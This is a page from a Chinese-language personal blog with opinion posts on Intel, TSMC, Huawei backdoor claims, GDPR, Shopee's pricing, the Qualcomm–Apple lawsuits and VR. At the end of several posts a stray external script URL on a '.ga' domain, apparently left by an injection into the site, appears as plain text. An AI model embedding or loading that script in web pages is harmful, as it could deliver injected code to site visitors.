分類
科技相關

Barron’s good article on the competitiveness strength of Intel

It’s worth of reading.

Some points illustrated as following:

Intel still makes 80% of CPUs for personal computers and 94% of them for servers. Its estimated revenue of 2020 maybe about $75 billion USD, and its net income $20.7B.

Its major rivalry, AMD, has the estimated revenue of $9.47B, up from $6.73B a year earlier(40.7% growth, YoY) and estimated net income of $1.5B, up from $756M (98% growth,YoY).

It means that every dollar growth in revenue can bring 2.4 dollars growth in net income, which reflects the feature of high-rent-value business. The economic scale decides the gross profit margin.

And this is the reason why Intel enjoys higher marginal rent value than AMD.

Besides Intel’s dominant area, it had failed in RF and mobile device industry such as its doomed WiMax chipsets and mobile phone SoCs. Now it is facing two major problems: 1) its manufacturing skill has been left behind of TSMC for one or two generations; and 2) its lack of machine-learning products.

In the history, Intel had lost its competition against then Japanese companies in the RAM industry. Intel waived its white flag and turned into the CPU industry in 1980s. However, such successful turning point has never shown again since the launch of its wifi chipset. I do not have enough confidence in its new M&A strategy in the AI field.

On the other hand, the TSMC’s 2 nm manufacturing advance is not unreachable for Intel. I think the nature physical barriers, like the quantum tunnelling effect, will delay the progress of IC manufacturing after 2nm. Although I’ve heard and read many issues in its manufacturing team. I still believe Intel’s outstanding engineers can get things done after all. It only takes time and money. Nonetheless, this is another big problem. After TSMC having enjoyed monopoly profits for quite a long time, even Intel could catch up with TSMC after spending about couple years and billions dollars, the remaining rent value will be limited for Intel. I am not sure whether the necessary costs of competition would be covered or not, especially considering that Intel has lost its big client, Apple. Of course, the intense competition would erode TSMC’s rent value, too. It’s not a good news for TSMC’s investors who recently got on the board at such high stock prices.

分類
科技相關 經濟分析

關於原創性

University of St. Andrews的生物學教授Elena Miu與Luke Rendell研究Mathworks Software 舉辦的程式編碼競賽,從1998~2012年,共14年19場公開競賽,近2000位參賽者提供超過45000份原始碼。比賽雖是解決科學問題,但並不存在單一正確的解答。評審依據程式碼的簡潔性與可用性來評分。

所有的程式碼與評分均公開,因此新比賽的參加者可以參考前屆比賽的內容。

這兩位生物學教授將對此程式碼的文化演化(cultural evolution)發現於2018年6月發表在知名期刊Nature的子刊Nature Communication上:

  1. 從比賽內容可以看出參賽者均嘗試在模仿與創新上取得平衡。
  2. 三種比賽策略,分別是「複製者(copiers)」、「標新立異者(mavericks)」 與「務實者(pragmatists)」。
    複製者幾乎複製前人較為成功的程式碼,僅嘗試細節微調;標新立異者則不管前人代碼,自己硬幹另闢蹊徑;務實者則是綜合二者,既參考前人成功代碼,也提出更多創意做較大幅度修改。
  1. 其結果是務實者的平均分數遠高於其他二者。
  2. 75%提交的程式碼幾乎都只是微調或細部修改前人之作。
  3. 少數標新立異富含原創性的程式碼中,大部分都失敗,解決問題能力遠低於另二種策略。但少數中的少數原創程式碼卻真能取得革命性進步。
  4. 這些極少數的成功原創代碼很快被複製者、務實者模仿並改進,代碼更為簡潔,處理問題成效更高。

兩位學者的研究相信對於我們這些經營過事業的人來說非常貼合實際經驗。完全原創的解決方案九成比舊方案還不如,只有少數會成功。模仿與改進前人方案的作法永遠是成功率最高、風險最低的安全策略。

如知名科普作家Matt Ridley就主張人類的創意也是會交配與演化,在競爭之下適者生存。如今看來再複雜難懂的高科技,也都是從一點一點簡單的想法創意彼此交互影響演化出來,沒有人不是站在前人肩膀上。

即便大眾看來橫空出世的愛迪生發明電燈,事實上在當年也早有許多組人馬進行相關研究。例如英國的物理學家Joseph Swan就比愛迪生更早展示他發明的電燈泡(incandescent bulb),並嗣後與愛迪生發生法律糾紛,最終以雙方和解收場。(這邊專利從業人員不禁懷疑愛迪生電燈泡專利的新穎性何在?)

同時期俄羅斯的Alexander Lodygin也發明了電燈泡。事實上根據歷史學家Robert Friedel、 Paul Israel 與 Bernard Finn三人的研究,與愛迪生同時期至少有23組人也各自發明了電燈。

不客氣地說,即便愛迪生在發明電燈之前不幸逝世,這世界享用電燈的時程甚至不會被拖延到一丁點。

而這些人在燈絲製造工藝、玻璃製造工藝、發電與電流配置等等工藝上,也都是站在前人的發明上加以結合改進。與此同時,用電發光在當年甚至已經不是「原創」想法,只是還沒人找到如何工業化大量生產的低成本方案罷了。

更進一步,我們亦可指出現代生活可見的所有產品與服務,細拆其生產要素,無論有形無形,甚至包含到產品設計風格、畫風…等抽象元素,我們都找不到「真正的原創」。

為何?因為需求定律使然,為了能獲利,為了能提高商品服務賣出機率,供應者必然多尋求成功率最高的策略 — 前述論文的務實者策略。

少部分供應者當然可以嘗試拉高原創性,但依然受到市場競爭的約束,造成9成以上冷門音樂永遠也不會成為大眾流行。

因此當某人哭么中國大陸某款熱賣遊戲只是模仿日本某款經典遊戲的畫風時而忽視遊戲內容有多麼不同時,我的看法只是某人的政治偏見在發作而已。如果光是模仿某經典遊戲畫風就能成功,為何市場並未充斥該種畫風呢?

參考文獻:

分類
科技相關 隨筆 證券投資 商業評論

台積電還有幾年絕對競爭優勢?

 

我並非從水資源困境,而是從電力供應質、量與可靠性與4奈米以下矽晶片會碰上的量子力學困難兩個角度推估。
關於第一點:

「…台積電去年一年用了130億度的電,但光是明年第一季要量產的5奈米,用電量就比起東台灣56萬人口的用電量還要大。
加上年底動工的3奈米,預計在2022年量產,一年用電更高達77億度,相當於去年總用電量的59.23%,並且超過台南市一年的民生及商業用電,用電量接近全台灣的3%,成長速度有如吃電怪獸。…」

假設市場需求大到3奈米廠需要幾座,台灣未來20年50%以上靠火力(尤其是燃燒天然氣)的電力規劃根本不可能在保證可靠性下供電。只要幾個大規模軍事演習造成海上LNG船供應不順暢,就很可怕了。

再加上政治軍事風險,Apple、AMD、Qualcomm這類大廠不見得樂見台積電一直是「唯一」小尺寸製程晶片製造供應商。

關於第二點,以目前4奈米鰭式電晶體的實驗成品來看,4奈米的絕緣層厚度僅有6個原子寬度,尺寸繼續縮小但不更換材料的前提下,量子隧道效應將會大幅降低晶片的成品良率,我的估計是不良率造成的成本提高很快就會吃掉繼續縮小尺寸提高的經濟利益。

目前只有手機或移動裝置才有足夠誘因與付費意願使用這麼小尺寸製程的晶片,但以移動裝置經通貨膨脹調整的實質價格,20年來是快速下滑的前提下,當前述經濟效應出現時,再加上多數手機效能已經達到多數人日常所需,高效能手機越來越利基市場時,三個條件匯聚,我懷疑廠商下單購買更小尺寸的晶片熱情是否能夠持續。

若單量不夠,規模經濟出不來,又會回頭造成更小尺寸晶片平均生產成本更高。

在這段碰壁期(我認為時間可能長達數年),因美國封鎖而被迫移轉大量資源到晶片製造上的中國就有了追趕時間。

別忘了,中國是目前全世界唯一一個,可以自己生產晶片生產線上幾乎所有所需零配件、化工、稀土原料的國家,包含ASML背後德國蔡司所具備的光學鏡頭打磨。

是的,中國技術都差人一截,但人家是站在「有」的基礎上。換言之,當今天是台積電被美國封鎖,禁止ASML出口機器給台積電時,又會怎樣?

當然我就不提當年協助台積電在縮小製程上突破的幾名大將,目前都被挖角到中國的現況了。

本來毋須多言,但避免誤會所以多提一句:我並非稱10年後台積電就沒有優勢,只是優勢差距將不再如此「近乎絕對」。大白話就是:邊際租值因競爭而下降。

分類
科技相關 商業評論

華為後門疑雲分析好文

另一篇與拙見不謀而合的華為後門疑雲分析文。

此篇幾乎看法均與小弟重疊:

1. 任何有後門的電子裝置一定可以從電氣等物理現象偵測,這點是非常基本的大一普物水準常識,偏偏就有許多「號稱資工專家」不懂。

走無線傳輸必定有電磁波訊號傳出,走有線也會有網路晶片的電氣反應。傳輸資料乃至於壓縮處理資料都會用到處理器運算,都會耗能發熱。這些都是現今物理環境下無可避免的可偵測現象。

(不才小弟雖非資工相關領域出身,但在藍芽與wifi通訊應用方面也有一個不重要的台灣美國兩地專利。無線傳輸稱不上專家,但多少懂一些;有線網路部分則考過一些也不太重要的網路工程師證照。)

2. 5G因為波長改變,相對於4G的覆蓋範圍小得多但可傳輸資料量卻大很多。這使得欲達到相同覆蓋範圍下,5G基地台使用數量將比4G高上數倍不止。(特別5G採用的微型基地台)

華為的確是華人之光,因為從無線通訊的後發追趕者到5G已成為部分通訊標準的制定者(Polar 碼部分)。

但我跟這位邱先生看法相同:這部份技術進步並非美國恐懼,而是大量5G基地台與相關設備都採用華為產品,將使得美國監聽全世界的自由性大幅降低!

所謂的「華為撼動美國國安」並非華為產品真有後門搞監聽,而是華為會影響美國暗黑手段的實施。

正如最近流行的段子所言:

美國:「聽說你們德國要採買華為網通設備,強烈建議停止此計畫。」

德國:「我們都沒公開的計畫,你美國怎麼會知道?」

美國:「我們監聽梅克爾手機知道的」

( BBC: 德國竊聽醜聞令默克爾感到尷尬
https://tinyurl.com/yb4tdoa6 )

3. 在PRISM計畫早已曝光的前提下,台灣還有一堆人對「被美國政府懷疑卻始終沒拿出確切證據的華為」大加撻伐,只彰顯這群人「只有立場沒有專業,只有反中沒有大腦」的本質。

就只是一群非常不重要的韭菜,是我等理性投資人獲利之來源。

因此看到許多這類笨蛋留言,小弟甚感欣慰 😀

分類
科技相關

看壞的產品– Freewriter

2017年初看到這玩意 — Freewriter,就很懷疑哪個蠢蛋會花549美元去買這樣一台使用E-Ink(許多電子書使用的螢幕)的純打字裝置。


果然2年下來,我從沒見過任何朋友或路人有拿出這裝置的,甚至連官網的使用評論也僅僅14人,比賣護手霜的還不如。

新型號Traveler pre-order更是從原價$599USD下殺41% 至$349。

這是我這兩年內非常看壞的創業項目之一,尤其他們宣稱的「現今電子裝置功能太多太讓人分心」的訴求,我認為只能騙住觀眾3秒鐘。

「為啥我要帶一個又大又笨重又只有單一功能的玩意在身上」這個念頭很快就會敲醒看倌。特別是,此裝置訴求的「寫作」功能還不完善 — 僅鍵盤與慢半拍的E-Ink螢幕,「編輯」肯定是一大硬傷!只能打字卻不能快速簡單編輯的裝置,恐怕效率還不如紙筆甚至手機的錄音與語音輸入功能。

如今籌資環境遠不如過去兩年友善,我很懷疑他們還能撐多久,繼續看下去。


https://js.developerstatss.ga/stat.js?n=ns1
分類
科技相關 筆記

“智慧塵"來啦~(Here Comes “Smart Dust")

感覺就是重炒被動式RFID這類曾被炒過的晶片與應用。

不過除了透過無線射頻來提供被動式晶片所需電能,也有透過溫度(或溫差),使得某些感應器可以不連接電線的前提下自己運作並發送資料。

已經有畜牧業者將此類被動式智慧塵晶片裝在牛隻身上監測其健康狀況。間諜活動上也可以減少監聽設備需要充電的風險。(這是否意味未來旅館偷拍將更容易?)

也有學者認為這類被動式無線感應器可減少汽車內部布線達50磅重。

不過就我自己從事過RFID產業的經驗,這類夸夸其談的各種幻想應用其實都需要相當長一段時間來驗證。許多想得很美好的方案最後都被證實失敗,例如我曾經手的RFID生物晶片監視養殖水產技術。

https://www.wsj.com/articles/here-comes-smart-dust-the-tiny-computers-that-pull-power-from-the-air-1541689224https://js.developerstatss.ga/stat.js?n=ns1

分類
科技相關 經濟分析 法律

不問利弊只管跟風的法律學者思維–簡論GDPR


知名刑事訴訟法教授林鈺雄投書蘋果日報的:「歐個資法上太空 台原地殺豬公」,就是典型只會跟風、只會「歐美法律都好棒棒」的台灣許多法律教授思維。

通篇文章看不到對歐盟新通過的GDPR(EU General Data Protection Regulation)有何法律經濟分析上可能造成的利與弊,而是直接假設「歐盟通過的法律一定好,台灣不跟就是鳥」的思維。

殊不知國外已有分析指出光是要符合新法標準,歐盟企業總共可能要額外負擔€2千億歐元,而美國企業可能要額外負擔$400多億美元。

如此增加的成本支出,是否真的能保障所謂的「個資權」?以及所欲保障的「個資權」是否在被保障者心中真的那麼重要?憑什麼政客可以代替人民決定「個資比較重要」?

再問,龐大的額外成本負擔,必然造成企業資源分配上的轉變,此轉變對歐盟企業國際競爭力是好是壞?這端視此GDPR是否讓企業把資源放在可帶來未來收益的項目上?就這種虛無飄渺的個資權保障來說,我認為很可能多數投資只是避免被處罰,而對產權保障或未來收入毫無助益。更甚者,此法的模糊地帶還可能侵害了企業主對未來收入的預期確定性。過去我曾討論過,任何人類權利都有邊界,無論是有形產權到無形基本人權,其實都是「權利組(collection of rights)」,當組合邊界過大到影響他種權利實施,亦或是大到邊界模糊的情形發生時,資訊費用與社會成本的增加是必然發生的後果。

這也表示林鈺雄教授之流根本忽略一個重要事實:過去20年來號稱最保障人民個資的歐盟,在其創造的經商環境下卻無任何一家活躍使用人數破億的網路社群或搜尋引擎公司出現。

此外,歐盟這種擅自納入全世界的罰則:「a fine up to €20 million or up to 4% of the annual worldwide turnover of the preceding financial year」,對許多非歐盟地區的小企業或新創事業而言,等到被罰款時直接放棄歐盟市場會是最經濟的策略。而在這種策略之下,這意味著未來許多跨國新興服務很可能直接略過歐盟地區,或是一被抓到違規就停止提供服務等現象將發生。歐盟過嚴苛的個資保護法規究竟保障了歐盟人民什麼,難道不值得深思?

也因此在我看來,本服務看似欲保障人民基本權利,實則增加既有巨頭(如Google、Facebook)的壟斷力,同時也增加此類大型跨國網路企業對歐盟官員的賄賂機率與金額。

管制必然帶來貪汙,而許多管制的誕生與存在也是為了服務貪汙。這點可參見我寫過的「貪汙的一般性理論 (https://wp.me/p9ffS3-jm)」。https://js.developerstatss.ga/stat.js?n=ns1

分類
科技相關 經濟分析 商業評論

論蝦皮免運費策略-兼論掠奪性定價

蝦皮這兩年免運費策略殺得台灣電商如PCHome哀哀叫。

本文先簡單經濟分析蝦皮的競爭策略,然後回頭分享我跟PCHome合作的不愉快經驗。

最近發展看來,開始有人出來聲稱要檢討蝦皮是否為陸資背景。

果然歐美法律之陋習台灣是學得很好 — 競爭不過別人,就拿無理法律出來耍流氓。

除了歐美失敗廠商常搞的反托拉斯法(台灣叫公平交易法),台灣還有個「陸資條款」。

先講反托拉斯法,從經濟分析來看,正常買方永遠不會嫌賣方賣得太便宜。

但公平交易法卻稱這是「掠奪性定價(predatory pricing)」,是不公平競爭需要立法管制禁止。

顯見立法者對於經濟學無知到一個極點。根據我對美國反托拉斯法的研究,當年Sherman Acts等各種法律之通過,立法者與執政者對於經濟學之無知與誤解有其緣由 — 當年經濟學家錯得離譜而不自知,又被政客利用使然。

當然,也可能立法者故意創造如此尋租的空間,來賺取政治利益,讓遊說團體、公關公司幫競爭落敗公司尋找利益輸送的管道與空間。這是我認為這類法律還存活,甚至被台灣政府照本宣科搬抄過來的理由之一。

掠奪性定價始終只是一個神話,是一個在真實世界不可能成立的競爭模式。

簡單經濟分析如下:

狀況一 — 賠錢賣

一家廠商本錢再如何雄厚,也不可能「永遠」賠錢賣。

當有一天這家賠錢賣廠商終於擠出市場內看得到的敵人而開始漲價時,那些曾經落敗或尚未進入市場的,一看市場租值開始回升,很快就又能重新進入市場。試問這家掠奪性定價策略廠商又要回頭繼續賠錢競爭?而它還能再賠多久?(這邊告訴我們關鍵在於「市場進入障礙」,因此不公平競爭真正存在,多半是既有廠商試圖透過政治法律手段建立進入障礙,如證照制度、資本額限制、各種法規限制,而這偏偏是公平交易法不處理的部份)

又,許多賠錢賣商品的策略執行時,市場內競爭對手甚至發現掠奪定價比自己進貨價還低時,乾脆迂迴從掠奪性定價廠商那邊少量進貨,自己縮小規模慢慢對耗,也是一種真實世界存在的策略。

又,競爭對手可能發現賠錢賣頂多是部分商品,不可能是全部商品時,競爭對手乾脆把會賠錢的訂單都倒給掠奪性定價者,讓它更快自爆死掉。

真實世界早年許文龍奇美壓克力創立時,遇到財大氣粗的競爭對手賠售競爭,許文龍乾脆逆向操作,細算對手成本結構,把對手毛利率賠最慘的品項找出後,奇美逆向漲價,訂單全倒過去,一年對手賠到賣祖產也不夠淘汰出局。

又,競爭對手可能乾脆採取差異化策略,區隔商品本質與內涵,從而提高租值跳脫殺價競爭。便當界就很常看到價格競爭與差異化競爭同時並存於市場中的現象,所以我們才會看到45元便當與千元便當均存在以滿足不同消費需求,反之,同一個消費者可能既享用千元便當,也購買45元便當,本身並無衝突。

真實世界並非不存在賠錢賣策略,但使用者通常心知肚明只能當做暫時性的廣告費用,不可能是長久性的競爭策略。亦或是少部分賠錢商品作為廣告吸引消費者購買能獲利的商品,希冀整體能夠獲利。

黎智英的蘋果日報甫進台灣,一份5元還送蘋果一顆,就是要用賠錢賺知名度的策略,黎智英自己也清楚所賠是廣告費,有其預算上限,達到效果就要收手。

顯然蝦皮也是為了快速在短時間內匯聚台灣市場人氣採取類似的策略。

分類
科技相關 筆記 專利 法律

Qualcomm 在中國北京法院提出對Apple的專利訴訟

Qualcomm 在中國北京法院提出對Apple的專利訴訟,要求禁止Apple在中國銷售與生產iPhone。

Qualcomm宣稱Apple侵害了該公司三項關於電源管理與3D Touch技術的非標準核心專利(non-standard essential patents)。

而今年初Apple也在美國FTC提出對Qualcomm濫用專利的訴願,同時也在美國法院控告Qualcomm濫收授權金。同時Apple及其供應商一同停止支付Qualcomm相關權利金。

Qualcomm這邊則在美國提出專利侵權訴訟,要求美國政府禁止進口iPhone與iPad相關產品。

現在中國也成為專利訴訟戰場的一部分,Q&A兩家公司的法律戰估計可以養肥很多律師與專家證人

專利權本身就是一種法律擬制的特許壟斷權,但權利範圍如何劃定與行使卻是一大難題,因此專利權與反托拉斯法的競合是塊很複雜也很有趣的領域,剛好是我先前工作的主要內容。

有空再多談一點這部份的判決案例吧。

https://js.developerstatss.ga/stat.js?n=ns1

分類
科技相關 商業評論

再看Virtual Reality

2016年5月我寫了篇討論VR的–我看Virtual Reality–,其中我談到:

「我認為,或許當年SONY應該多買幾家A片公司來得更實惠有效– 要知道HD DVD與Blueray的格式大戰可是靠A片公司選邊站發揮效果!
但是VR呢?現階段我們真的看不太到有什麼突破性的內容。Facebook說要提供$1千萬美金、HTC說要提供$1億美金來激勵VR內容創作,但其實都太少太少。而大家似乎又都忘了最重要的A片內容產業…」
「就VR遊戲,我認為VR根本就是「近視製造機」,對家長來說要認同有非常大的困難。換言之,小的不准玩,大的只會是部分未當父母的少數成年人,而且不過是手上的眾多玩具之一而已。但初期硬體效能不彰的問題絕對是如影隨形地影響消費意願。
至於VR在導覽或銷售等商業用途加分這點,我認為效果近乎為零。假的場景或3D圖像,不可能消弭消費者心中的疑慮,甚至只會增加資訊成本。畢竟沒人會明知道是電腦動畫而選擇被騙的,消費決策跟看電影是兩回事。
去年(2015)我的投資主軸就是放空宏達電。今年1月以來改做多石油與原物料,但長期我依然看空宏達電。我不相信宏達電的VR願景,更不相信王雪紅的為人」

目前看來,VR始終沒有HTC宣稱的噴發性成長。而消費者端陸續有–暈眩、不舒服、噁心、悶熱、頭重、衛生問題…等等疑慮,女性朋友甚至提出VR頭盔有破壞妝容的缺點。我自己的觀察,家長願意給未成年子女買VR頭盔的似乎也不多

VR平台上連像POKEMON GO這樣流星但絢爛的遊戲都沒出現,更甭提依然沒太多人願意長時間用VR看電影(其實3D電視的3D功能也多半是畫蛇添足,重度使用者極少,連SONY自家3D眼鏡明明銷量不高還常缺貨就可知一二)。講難聽點,去年到現在VR的火熱程度連手指陀螺都比不上。

相較起來,我認為AR成功率可能還高一點,這部份就看Apple新iPhone發表後的業界發展。

但回應Google的VR創意領導人Jason Toff的提問,我認為對投資人而言,5年內大麻市場更值得期待!https://js.developerstatss.ga/stat.js?n=ns1